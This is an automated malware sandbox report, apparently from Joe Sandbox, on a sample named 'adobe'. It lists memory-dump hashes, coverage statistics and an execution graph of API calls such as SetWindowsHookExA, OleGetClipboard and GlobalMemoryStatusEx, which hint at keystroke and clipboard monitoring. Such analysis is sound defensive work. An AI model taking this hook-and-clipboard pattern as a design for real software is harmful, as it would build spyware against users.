                                    • Opcode ID: d1a166cebf2bdc6aed26607cdd42120a7285399b8532ab0255c41107e1aff8da
                                    • Instruction ID: 5bb09626985497d8724c37880b77a4b0956abdf992bd29b8736fceed19e08bea
                                    • Opcode Fuzzy Hash: d1a166cebf2bdc6aed26607cdd42120a7285399b8532ab0255c41107e1aff8da
                                    • Instruction Fuzzy Hash: 78E0E2B59082688FCB50DF58D8907AEBBFABB19310F109185E05DE7306D730AD80CF42
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad8ea3673dba17ca1a5e3f4050878d84fdf0aa9d9cd3d84d1acc5a7bedbddbf9
                                    • Instruction ID: e7eb971e41845cc0d121306f5ee03ce87893dfe6da3d7ebf22084e232ba04149
                                    • Opcode Fuzzy Hash: ad8ea3673dba17ca1a5e3f4050878d84fdf0aa9d9cd3d84d1acc5a7bedbddbf9
                                    • Instruction Fuzzy Hash: F8E0127790414CDBC740CBB4DF4529A7FF1EF45220F2446EAD416D7251EA368A019742
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6384d6a4b8d619fc11de0df5b441dbfa5f89ecd9dce3d65da81b5091c5bb2cab
                                    • Instruction ID: 84ba5217fc4c82d7b9921d243605bd4c1ff270362b10efe048447fcde474eb9f
                                    • Opcode Fuzzy Hash: 6384d6a4b8d619fc11de0df5b441dbfa5f89ecd9dce3d65da81b5091c5bb2cab
                                    • Instruction Fuzzy Hash: 0ED0C772D4910CFF8B00DFA4890199EB7FDDB4514079045E69505D7110ED365A1557E2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eca9801a4b1f6fe408e6182e3edc2cb07cc9ac14754f8007709dabd3694a199f
                                    • Instruction ID: 483db9e32e7538e1019118b9f238e4130d6ed6bb49c5ec4b97c312a5fc9af526
                                    • Opcode Fuzzy Hash: eca9801a4b1f6fe408e6182e3edc2cb07cc9ac14754f8007709dabd3694a199f
                                    • Instruction Fuzzy Hash: 9FD0A77690010CEFC700DFA0C94049D7FFEEB08210B1044E6E806D3210ED354A005792
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 44423e6c21d75701eca0e3e47a12c1a85bd3575b230757a77aa8a1d735cace5e
                                    • Instruction ID: de935079136753fc3ff141e8f705a822afe0bb66122f6e2217bb7aeef0bec757
                                    • Opcode Fuzzy Hash: 44423e6c21d75701eca0e3e47a12c1a85bd3575b230757a77aa8a1d735cace5e
                                    • Instruction Fuzzy Hash: 2FD0A7762042106FD240C918CC00F53B395EBC8720F18C90EF4A0833E0DB63DC02CB90
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7356d37f2d525d9f9582e608741b787829384326b1a483a9177c879fb0069732
                                    • Instruction ID: a8779afe162c4b3bac42b871e8f077d08a907fbb40ff538b0c8145da9d0ea236
                                    • Opcode Fuzzy Hash: 7356d37f2d525d9f9582e608741b787829384326b1a483a9177c879fb0069732
                                    • Instruction Fuzzy Hash: 3DC08CB3B000002BC30CCAD8CC51752A392CBE8300F28CC6BA808DB340EA2BDD038288
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cee6f881f926603d293383916bf87a83a0dffb2148474bc917becfdf6f54a92
                                    • Instruction ID: 861784d121f0616d127c245e5382f9022140148b71ac035f7b53dec6b26397d4
                                    • Opcode Fuzzy Hash: 2cee6f881f926603d293383916bf87a83a0dffb2148474bc917becfdf6f54a92
                                    • Instruction Fuzzy Hash: 9FD0A7324042044AC341EB28C894789FBB4BF81308F04C65FDCC45B215EF75D44ADB81
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83ac87b33f4e7c2ed6fd866f96dfa45f7872808ebc2cc145dd578ae07973c42f
                                    • Instruction ID: a1cbd0c1e1eb3776157d73c83f72428de7c9d4044dd0bed02cedb038e46015fc
                                    • Opcode Fuzzy Hash: 83ac87b33f4e7c2ed6fd866f96dfa45f7872808ebc2cc145dd578ae07973c42f
                                    • Instruction Fuzzy Hash: 49D05E7520C2828FC305CF44E550815BBA1EF96200B15888EEC5197246C722DC12CB36
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 18caacad267c050a140cf0e584327bf300c5516fc678aea809c7f7fdad8831aa
                                    • Instruction ID: cd68c4c5a79c252e4cf7653fc3283620a8d2e3e804c8e4aad773b991d5e13512
                                    • Opcode Fuzzy Hash: 18caacad267c050a140cf0e584327bf300c5516fc678aea809c7f7fdad8831aa
                                    • Instruction Fuzzy Hash: 19C0122430094807E709C328CC41304A7A29BC9215F68C2BCA868C73E6EB2ACC038600
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 066892ed072b5ade307b0d300ebb94d5f6eac7ef3de3ad69f041c18133a27895
                                    • Instruction ID: b2a425aedafffadb5d1955cabdf59c613925d127352e620d4484f04c7ae5b01c
                                    • Opcode Fuzzy Hash: 066892ed072b5ade307b0d300ebb94d5f6eac7ef3de3ad69f041c18133a27895
                                    • Instruction Fuzzy Hash: 70C02B3201170C87E20137F4F40E7647F6C6705306F404020F20D414528FBC5080CF62
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 941def5b792158e9b0974a78a2ab86eef914b8180bcb2b83110e6320fd51a73d
                                    • Instruction ID: 19eba5c10770b19882abc25e0b6d630f91564694bed7d4943710962308afc859
                                    • Opcode Fuzzy Hash: 941def5b792158e9b0974a78a2ab86eef914b8180bcb2b83110e6320fd51a73d
                                    • Instruction Fuzzy Hash: A1C0EA641096C05FD7428624C9A5744AF71AB8720DF69C0DEA4889FA97DA6BD80B8702
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3280e6e329ef31447f1898656c2e33f90a97c83c0441c5bd5be684c062d4b347
                                    • Instruction ID: ad9f64657505e76eb31e5dafeb601260d8735d35c93f3fb22e8af20b12ad2807
                                    • Opcode Fuzzy Hash: 3280e6e329ef31447f1898656c2e33f90a97c83c0441c5bd5be684c062d4b347
                                    • Instruction Fuzzy Hash: 0DC04C7B1560049B8A41B764C98CC15FAA6FF997047858892A28546034D629D518DB16
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 58cb33d46a03b9f49070130d129416bda64a13dc20def6f9731980ae63d9d829
                                    • Instruction ID: 4d57411e723f5dd1be5bec6aeb1138ac1fc761e98288c13e3c93c5a3c5e54281
                                    • Opcode Fuzzy Hash: 58cb33d46a03b9f49070130d129416bda64a13dc20def6f9731980ae63d9d829
                                    • Instruction Fuzzy Hash: D8C002B3D1C248CFC725CF60D4654AC7F7AAB0E691B20555A906797253CA681841CF17
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fd44a762dbc894d264ad16d9ebceccec7f339f0f4123fef2a1dde8799dbb7abf
                                    • Instruction ID: 8dd6d2aae9a9bec318c93b5df869804a22a50b84431d2ea7eeab89ab4a0c0d41
                                    • Opcode Fuzzy Hash: fd44a762dbc894d264ad16d9ebceccec7f339f0f4123fef2a1dde8799dbb7abf
                                    • Instruction Fuzzy Hash: 5CB012BB2D524AA1840077648D8CD2FE615EFA2F00FD08C16B3C540058C52D84B9D71F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 787fb87cf780cad9599bd9803dd1b8e4691737f104342aad049e877fb0d6420b
                                    • Instruction ID: ba96e24316a7b63bd25850609c9f122522cd52cee16698c4e14f8d1f9d536d38
                                    • Opcode Fuzzy Hash: 787fb87cf780cad9599bd9803dd1b8e4691737f104342aad049e877fb0d6420b
                                    • Instruction Fuzzy Hash: C0C048A100E3C18EEB0396B4A8250426FB06D4311030A02DBF4A0C94A7CB096A29E726
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f92e84ed5da43edc569fc6802297287fa2ecec8b11058c7437aca36e8bd495d2
                                    • Instruction ID: ae0b5bdaa353a95324f737ef42d31f4f8fef8043bd51bafb5eb9fc041e7e655f
                                    • Opcode Fuzzy Hash: f92e84ed5da43edc569fc6802297287fa2ecec8b11058c7437aca36e8bd495d2
                                    • Instruction Fuzzy Hash: AEC048B2D08208CBCB24CFA0D0644ACBBBAEB0D291B20551EA027A3202CB681842CF12
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

                                    Execution Graph

                                    Execution Coverage:10.6%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:198
                                    Total number of Limit Nodes:23
                                    execution_graph 38891 12a0848 38893 12a084e 38891->38893 38892 12a091b 38893->38892 38895 12a134f 38893->38895 38897 12a1353 38895->38897 38896 12a147a 38896->38893 38897->38896 38901 12afb80 38897->38901 38905 12afb90 38897->38905 38909 12a8219 38897->38909 38902 12afba2 38901->38902 38904 12afc19 38902->38904 38915 12af2bc 38902->38915 38904->38897 38906 12afba2 38905->38906 38907 12af2bc 3 API calls 38906->38907 38908 12afc19 38906->38908 38907->38908 38908->38897 38910 12a8223 38909->38910 38911 12a82d9 38910->38911 38947 696fb27 38910->38947 38957 696f8d9 38910->38957 38962 696f8e8 38910->38962 38911->38897 38916 12af2c7 38915->38916 38920 6950f73 38916->38920 38926 6950f88 38916->38926 38917 12afdfa 38917->38904 38921 6950f88 38920->38921 38922 6951062 38921->38922 38932 695039c 38921->38932 38922->38922 38927 6950fb3 38926->38927 38928 695039c GetModuleHandleW 38927->38928 38930 6951062 38927->38930 38929 69510a6 38928->38929 38931 6952e0d 2 API calls 38929->38931 38931->38930 38933 6951db0 GetModuleHandleW 38932->38933 38935 69510a6 38933->38935 38936 6952e0d 38935->38936 38937 6952e11 38936->38937 38937->38922 38938 6952e52 CreateWindowExW 38937->38938 38941 6952e0d CreateWindowExW 38937->38941 38943 6952e58 38937->38943 38940 6952f7c 38938->38940 38941->38937 38944 6952ec0 CreateWindowExW 38943->38944 38946 6952f7c 38944->38946 38946->38946 38950 696fb36 38947->38950 38951 696f8fd 38947->38951 38948 696fb12 38948->38911 38949 696fbd0 38949->38911 38950->38949 38967 12aecfb 38950->38967 38971 12aed08 38950->38971 38951->38948 38955 696fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 38951->38955 38956 696fb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 38951->38956 38952 696fc9e 38952->38911 38955->38951 38956->38951 38959 696f8fd 38957->38959 38958 696fb12 38958->38911 38959->38958 38960 696fb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 38959->38960 38961 696fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 38959->38961 38960->38959 38961->38959 38963 696f8fd 38962->38963 38964 696fb12 38963->38964 38965 696fb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 38963->38965 38966 696fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 38963->38966 38964->38911 38965->38963 38966->38963 38968 12aed08 38967->38968 38974 12aed30 38968->38974 38969 12aed16 38969->38952 38973 12aed30 2 API calls 38971->38973 38972 12aed16 38972->38952 38973->38972 38975 12aed4d 38974->38975 38976 12aed75 38974->38976 38975->38969 38982 12aed30 GlobalMemoryStatusEx 38976->38982 38983 12aee18 38976->38983 38977 12aed96 38977->38969 38978 12aed92 38978->38977 38979 12aee5e GlobalMemoryStatusEx 38978->38979 38980 12aee8e 38979->38980 38980->38969 38982->38978 38984 12aee5e GlobalMemoryStatusEx 38983->38984 38985 12aee8e 38984->38985 38985->38978 38986 f5d030 38987 f5d048 38986->38987 38988 f5d0a2 38987->38988 38995 695170c 38987->38995 39003 69516fc 38987->39003 39007 6953002 38987->39007 39013 6953010 38987->39013 39019 695769e 38987->39019 39027 695313e 38987->39027 38996 6951717 38995->38996 38997 6957701 38996->38997 38999 69576f1 38996->38999 39043 6956694 38997->39043 39031 6957818 38999->39031 39037 6957828 38999->39037 39000 69576ff 39000->39000 39004 6951707 39003->39004 39106 6951734 39004->39106 39006 6953147 39006->38988 39008 6953010 39007->39008 39009 69516fc GetModuleHandleW 39008->39009 39010 6953042 39009->39010 39011 695170c 2 API calls 39010->39011 39012 6953057 39011->39012 39012->38988 39014 6953036 39013->39014 39015 69516fc GetModuleHandleW 39014->39015 39016 6953042 39015->39016 39017 695170c 2 API calls 39016->39017 39018 6953057 39017->39018 39018->38988 39021 69576a0 39019->39021 39020 6957701 39022 6956694 2 API calls 39020->39022 39021->39020 39023 69576f1 39021->39023 39024 69576ff 39022->39024 39025 6957818 2 API calls 39023->39025 39026 6957828 2 API calls 39023->39026 39024->39024 39025->39024 39026->39024 39028 6953140 39027->39028 39029 6951734 GetModuleHandleW 39028->39029 39030 6953147 39029->39030 39030->38988 39032 6957828 39031->39032 39033 6956694 2 API calls 39032->39033 39034 695790e 39032->39034 39050 6957cf1 39032->39050 39055 6957d00 39032->39055 39033->39032 39034->39000 39039 6957836 39037->39039 39038 6956694 2 API calls 39038->39039 39039->39038 39040 695790e 39039->39040 39041 6957cf1 OleGetClipboard 39039->39041 39042 6957d00 OleGetClipboard 39039->39042 39040->39000 39041->39039 39042->39039 39044 695669f 39043->39044 39045 6957a14 39044->39045 39046 695796a 39044->39046 39048 695170c OleGetClipboard 39045->39048 39047 69579c2 CallWindowProcW 39046->39047 39049 6957971 39046->39049 39047->39049 39048->39049 39049->39000 39051 6957cf6 39050->39051 39052 6957ce6 39051->39052 39060 69582c0 39051->39060 39066 6958298 39051->39066 39052->39032 39056 6957d1f 39055->39056 39057 6957d8a 39056->39057 39058 69582c0 OleGetClipboard 39056->39058 39059 6958298 OleGetClipboard 39056->39059 39057->39032 39058->39056 39059->39056 39062 69582c8 39060->39062 39061 69582dc 39061->39051 39062->39061 39072 69582f9 39062->39072 39083 6958308 39062->39083 39063 69582f1 39063->39051 39068 695829d 39066->39068 39067 6958215 39067->39051 39068->39067 39070 69582f9 OleGetClipboard 39068->39070 39071 6958308 OleGetClipboard 39068->39071 39069 69582f1 39069->39051 39070->39069 39071->39069 39073 6958302 39072->39073 39074 6958335 39073->39074 39076 6958379 39073->39076 39079 69582f9 OleGetClipboard 39074->39079 39080 6958308 OleGetClipboard 39074->39080 39075 695833b 39075->39063 39078 69583f9 39076->39078 39094 69585d0 39076->39094 39098 69585c0 39076->39098 39077 6958417 39077->39063 39078->39063 39079->39075 39080->39075 39084 695831a 39083->39084 39085 6958335 39084->39085 39087 6958379 39084->39087 39090 69582f9 OleGetClipboard 39085->39090 39091 6958308 OleGetClipboard 39085->39091 39086 695833b 39086->39063 39089 69583f9 39087->39089 39092 69585d0 OleGetClipboard 39087->39092 39093 69585c0 OleGetClipboard 39087->39093 39088 6958417 39088->39063 39089->39063 39090->39086 39091->39086 39092->39088 39093->39088 39096 69585e5 39094->39096 39097 695860b 39096->39097 39102 69580a8 39096->39102 39097->39077 39100 69585d0 39098->39100 39099 69580a8 OleGetClipboard 39099->39100 39100->39099 39101 695860b 39100->39101 39101->39077 39103 6958678 OleGetClipboard 39102->39103 39105 6958712 39103->39105 39107 695173f 39106->39107 39108 695039c GetModuleHandleW 39107->39108 39109 6953217 39107->39109 39108->39109 39112 69584e0 39113 69584eb 39112->39113 39115 69584fb 39113->39115 39116 6956834 39113->39116 39117 6958530 OleInitialize 39116->39117 39118 6958594 39117->39118 39118->39115 39119 6957c20 39121 6957c28 39119->39121 39122 6957c4b 39121->39122 39123 69566ec 39121->39123 39124 6957c60 KiUserCallbackDispatcher 39123->39124 39126 6957cce 39124->39126 39126->39121 39110 6956a98 DuplicateHandle 39111 6956b2e 39110->39111 39127 695a2c8 39129 695a30c SetWindowsHookExA 39127->39129 39130 695a352 39129->39130 39131 6951daa 39132 6951db0 GetModuleHandleW 39131->39132 39134 6951e25 39132->39134

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 125 6963418-6963439 126 696343b-696343e 125->126 127 6963464-6963467 126->127 128 6963440-696345f 126->128 129 696346d-696348c 127->129 130 6963c08-6963c0a 127->130 128->127 138 69634a5-69634af 129->138 139 696348e-6963491 129->139 132 6963c11-6963c14 130->132 133 6963c0c 130->133 132->126 135 6963c1a-6963c23 132->135 133->132 143 69634b5-69634c4 138->143 139->138 140 6963493-69634a3 139->140 140->143 254 69634c6 call 6963c30 143->254 255 69634c6 call 6963c38 143->255 144 69634cb-69634d0 145 69634d2-69634d8 144->145 146 69634dd-69637ba 144->146 145->135 167 69637c0-696386f 146->167 168 6963bfa-6963c07 146->168 177 6963871-6963896 167->177 178 6963898 167->178 180 69638a1-69638b4 call 6962368 177->180 178->180 183 6963be1-6963bed 180->183 184 69638ba-69638dc call 6962374 180->184 183->167 185 6963bf3 183->185 184->183 188 69638e2-69638ec 184->188 185->168 188->183 189 69638f2-69638fd 188->189 189->183 190 6963903-69639d9 189->190 202 69639e7-6963a17 190->202 203 69639db-69639dd 190->203 207 6963a25-6963a31 202->207 208 6963a19-6963a1b 202->208 203->202 209 6963a33-6963a37 207->209 210 6963a91-6963a95 207->210 208->207 209->210 213 6963a39-6963a63 209->213 211 6963bd2-6963bdb 210->211 212 6963a9b-6963ad7 210->212 211->183 211->190 224 6963ae5-6963af3 212->224 225 6963ad9-6963adb 212->225 220 6963a65-6963a67 213->220 221 6963a71-6963a8e call 6962380 213->221 220->221 221->210 228 6963af5-6963b00 224->228 229 6963b0a-6963b15 224->229 225->224 228->229 232 6963b02 228->232 233 6963b17-6963b1d 229->233 234 6963b2d-6963b3e 229->234 232->229 235 6963b21-6963b23 233->235 236 6963b1f 233->236 238 6963b56-6963b62 234->238 239 6963b40-6963b46 234->239 235->234 236->234 243 6963b64-6963b6a 238->243 244 6963b7a-6963bcb 238->244 240 6963b4a-6963b4c 239->240 241 6963b48 239->241 240->238 241->238 245 6963b6e-6963b70 243->245 246 6963b6c 243->246 244->211 245->244 246->244 254->144 255->144
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: 1925c3cd0b38caa2896fec43d2341c7b995b47dec3e864a561a618e93ac23e48
                                    • Instruction ID: 55d1b08021736d2d6409e6f55ed26c508f62760a93e47b192bab1b640d4a68e8
                                    • Opcode Fuzzy Hash: 1925c3cd0b38caa2896fec43d2341c7b995b47dec3e864a561a618e93ac23e48
                                    • Instruction Fuzzy Hash: 77321D34E1071A8FCB14EF75D9945ADF7B6FF89300F209669E409A7264EB30A985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 799 6967cf8-6967d16 800 6967d18-6967d1b 799->800 801 6967d3e-6967d41 800->801 802 6967d1d-6967d39 800->802 803 6967d43-6967d4d 801->803 804 6967d4e-6967d51 801->804 802->801 806 6967d53-6967d61 804->806 807 6967d68-6967d6b 804->807 814 6967d63 806->814 815 6967d9e-6967db4 806->815 808 6967d8c-6967d8e 807->808 809 6967d6d-6967d87 807->809 811 6967d95-6967d98 808->811 812 6967d90 808->812 809->808 811->800 811->815 812->811 814->807 819 6967fcf-6967fd9 815->819 820 6967dba-6967dc3 815->820 821 6967fda-696800f 820->821 822 6967dc9-6967de6 820->822 825 6968011-6968014 821->825 829 6967fbc-6967fc9 822->829 830 6967dec-6967e14 822->830 827 69680c1-69680c4 825->827 828 696801a-6968026 825->828 831 69680c6-69680e2 827->831 832 69680e7-69680ea 827->832 835 6968031-6968033 828->835 829->819 829->820 830->829 855 6967e1a-6967e23 830->855 831->832 833 69680f0-69680ff 832->833 834 696831f-6968321 832->834 850 6968101-696811c 833->850 851 696811e-6968162 833->851 840 6968323 834->840 841 6968328-696832b 834->841 838 6968035-696803b 835->838 839 696804b-696804f 835->839 843 696803f-6968041 838->843 844 696803d 838->844 846 6968051-696805b 839->846 847 696805d 839->847 840->841 841->825 845 6968331-696833a 841->845 843->839 844->839 848 6968062-6968064 846->848 847->848 853 6968066-6968069 848->853 854 696807b-69680b4 848->854 850->851 860 69682f3-6968309 851->860 861 6968168-6968179 851->861 853->845 854->833 879 69680b6-69680c0 854->879 855->821 857 6967e29-6967e45 855->857 867 6967faa-6967fb6 857->867 868 6967e4b-6967e75 857->868 860->834 869 69682de-69682ed 861->869 870 696817f-696819c 861->870 867->829 867->855 882 6967fa0-6967fa5 868->882 883 6967e7b-6967ea3 868->883 869->860 869->861 870->869 881 69681a2-6968298 call 6966510 870->881 932 69682a6 881->932 933 696829a-69682a4 881->933 882->867 883->882 889 6967ea9-6967ed7 883->889 889->882 895 6967edd-6967ee6 889->895 895->882 897 6967eec-6967f1e 895->897 904 6967f20-6967f24 897->904 905 6967f29-6967f45 897->905 904->882 906 6967f26 904->906 905->867 907 6967f47-6967f9e call 6966510 905->907 906->905 907->867 934 69682ab-69682ad 932->934 933->934 934->869 935 69682af-69682b4 934->935 936 69682b6-69682c0 935->936 937 69682c2 935->937 938 69682c7-69682c9 936->938 937->938 938->869 939 69682cb-69682d7 938->939 939->869
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq
                                    • API String ID: 0-3550614674
                                    • Opcode ID: 1549a3aa10a29a47d1600ff070d7f1a4be764cca00ed31d5c3af745c8e279e76
                                    • Instruction ID: 6bc61680ed1204066f7a9b8964f91059aff81bb0c0ae9651ae27ae4d0b402b81
                                    • Opcode Fuzzy Hash: 1549a3aa10a29a47d1600ff070d7f1a4be764cca00ed31d5c3af745c8e279e76
                                    • Instruction Fuzzy Hash: BE02A030B006058FDB54DBA5D650AAEB7F6FF84304F248929E405DB799DB35EC86CB90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31a6ec345c2a093efa144be2fc2282f35e95f20db1573a5ca1db5c01e4a30bbc
                                    • Instruction ID: 30c40d59992299e985d882772624e544c5d79582383a402ccea92ccf42548cd4
                                    • Opcode Fuzzy Hash: 31a6ec345c2a093efa144be2fc2282f35e95f20db1573a5ca1db5c01e4a30bbc
                                    • Instruction Fuzzy Hash: 6C926834E003048FDB64CF69C584A6DBBF6EF45310F6484A9E84AAB765DB35ED85CB80
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86cc00ba5f4845164cd7fde4690bb18b568127803d151a722c88348891e7f0f8
                                    • Instruction ID: 26ffdfe2790e42a36a132785528745cf94984ef8efe65cb70a88bc2663f044c5
                                    • Opcode Fuzzy Hash: 86cc00ba5f4845164cd7fde4690bb18b568127803d151a722c88348891e7f0f8
                                    • Instruction Fuzzy Hash: B062CD30B002048FDB64DB69D594BADB7F6EF88314F248429E806EB795DB35ED46CB81
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
